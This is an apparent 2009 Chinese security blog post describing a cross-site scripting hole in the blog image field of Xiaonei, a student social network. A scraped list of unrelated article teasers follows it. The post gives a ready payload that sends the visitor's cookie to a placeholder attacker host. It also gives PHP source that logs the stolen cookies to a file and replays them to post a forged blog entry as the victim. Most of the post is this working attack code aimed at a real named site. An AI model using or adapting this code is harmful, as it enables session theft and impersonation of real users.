校内网一个跨站漏洞的利用
作者:Flyh4t 来源:Flyh4t 发布时间:2009-04-15 12:21:00
校内网在发blog时对插入图片过滤不严格,存在xss漏洞
在发blog时将插入图片URL写为如下代码即可触发:
javascript:window.location.href='http://xxxxx/test.php?cookie='+document.cookie
test.php的作用是窃取cookie、伪造阅览者身份发一个blog、跳转到一个正常的日志,代码如下:
<?phpob_start();$url = 'blog.xiaonei.com';$cookie=$_GET['cookie'];$cookie1=$cookie."\r\n\r\n";fputs(fopen('a.txt','a+'),$cookie1); //cookie写入 a.txt//发一条伪造的日志,这条日志里面也可以插入恶意代码$sock = fsockopen("$url", 80, $errno, $errstr, 30);if (!$sock) die("$errstr ($errno)\n");$data = "title=test by fly&body=test by fly&categoryId=0&blogControl=99&passwordProtedted=0&passWord=&blog_pic_id=&pic_path=&activity=&id=&relative_optpe=";fwrite($sock, "POST http://$url/NewEntry.do HTTP/1.1\r\n");fwrite($sock, "Accept: */*\r\n");fwrite($sock, "Referer: http://$url\r\n");fwrite($sock, "Accept-Language: zh-cn\r\n");fwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");fwrite($sock, "Accept-Encoding: gzip, deflate\r\n");fwrite($sock, "User-Agent: Mozilla\r\n");fwrite($sock, "Host: $url\r\n");fwrite($sock, "Content-Length: ".strlen($data)."\r\n");fwrite($sock, "Connection: Keep-Alive\r\n");fwrite($sock, "Cache-Control: no-cache\r\n");fwrite($sock, "Cookie:".$cookie."\r\n\r\n");fwrite($sock, $data);
0
投稿猜你喜欢
10月12日消息,据腾讯公司最新公布数据显示:2009年10月10日20点,腾讯QQ同时在线用户突破8000万。CNNIC日前最新发布的互联- 2008年4月初开始了健康之家的建设,就从代理商那里买了空间域名,开始建站。一开始用了风讯CMS新闻发布系统,架构好网站以后,因为自己是学生
- 北京时间11月9日早间消息,据国外媒体今日报道,Facebook计划发布一款XMPP(可扩展消息处理现场协议)界面,进入即时通讯领域。Fac
- 系统服务篇一1. 服务名称:Al
- 因川普2009年11月10日开通淘宝旺铺创业扶植版时,发现淘宝网推出的旺铺创业扶植版的问题,在免费的淘宝店铺装修网站:鱼摆摆网店装修网网站发
- “倾城”在WP中文模板区建议正文文字两端对齐,从而达到美化模板的目的。目前,对于英文文章,只需要设定 text-align:justify;
- 百度与站长的斗争个人站长对于百度的SEO,方法有无穷种,单纯靠技术,百度一点办法都没有。于是百度增加了人工干预,打击了不少网站,作弊的,非作
- 大量复制内容网站有的时候会影响关键字的排名。比如说原本是你写的文章,本来应该排名很好,但是其他人抄袭或转载你的文章,而且搜索引擎不幸的判断那
- 12月2日消息,淘宝网昨天与华数数字电视传媒集团签署战略合作协议,双方将在在电视淘宝购物、数字产品、手机淘宝、口碑网便民服务等业务领域开展全
- 内容摘要:拥有大量的历史积累的各种论坛系统中的内容往往很难被搜索引擎收录,BBS2BLOG是一个bbs改造思路:通过对现有BBS加入按“个人
- 如何在Vmware中创建Linux虚拟机并设置Vmware和虚拟机网络创建Linux虚拟机创建虚拟机配置类型选择自定义虚拟机硬件兼容性,选择
- Windows 2000 Server安装成功后,一般会启动一个默认的Web站点,为整个网络提供Internet服务。在中小型局域网中,服务
- 核心提示: 本文收集了网络上比较常见的和大家比较关心的SEO问题,并附上解决办法1、为什么网站收录在近几天突然下降?答:这个在短时间内是正常
- 前言Vim 的设计哲学中有这样一句话:”if you write a thing once, it is okay. However if
- 给文件夹设置权限二添加Guests组和虚拟主机组用户拒绝权限Guests组可以访问某些文件可能会造成安全隐患,我们应该拒绝Guests组访问
- 最近一个朋友的Blog在做301重定向的过程中遇到了一些困难。大概的情况就是,原来的Blog域名不打算做了,在新的域名上重启炉灶,重新开始写
- 前言linux权限多设的比较松的其实,但有的虚拟机还是不能跨目录访问的。在提不了权的情况下,试试如下代码吧。运气好的话说不定就跨过去了。下面
- 如果要允许用户在站点中上载或下载文件,就需要在 Web 服务器上设置 FTP。无论站点是位于 Intranet 还是位于 Internet
- 如何修改VMware vSphere ESXi系统设置静态IP前言:实验测试的环境中,我们为了方便管理,一般将采取静态IP配置来测试实验,接
- 一个配置好的MAIL服务器除基本功能外应该具有的其它功能:* 反垃圾邮件能力。检查连接或内容,阻挡某些认为是不良的连接以及信件。* 反病毒能
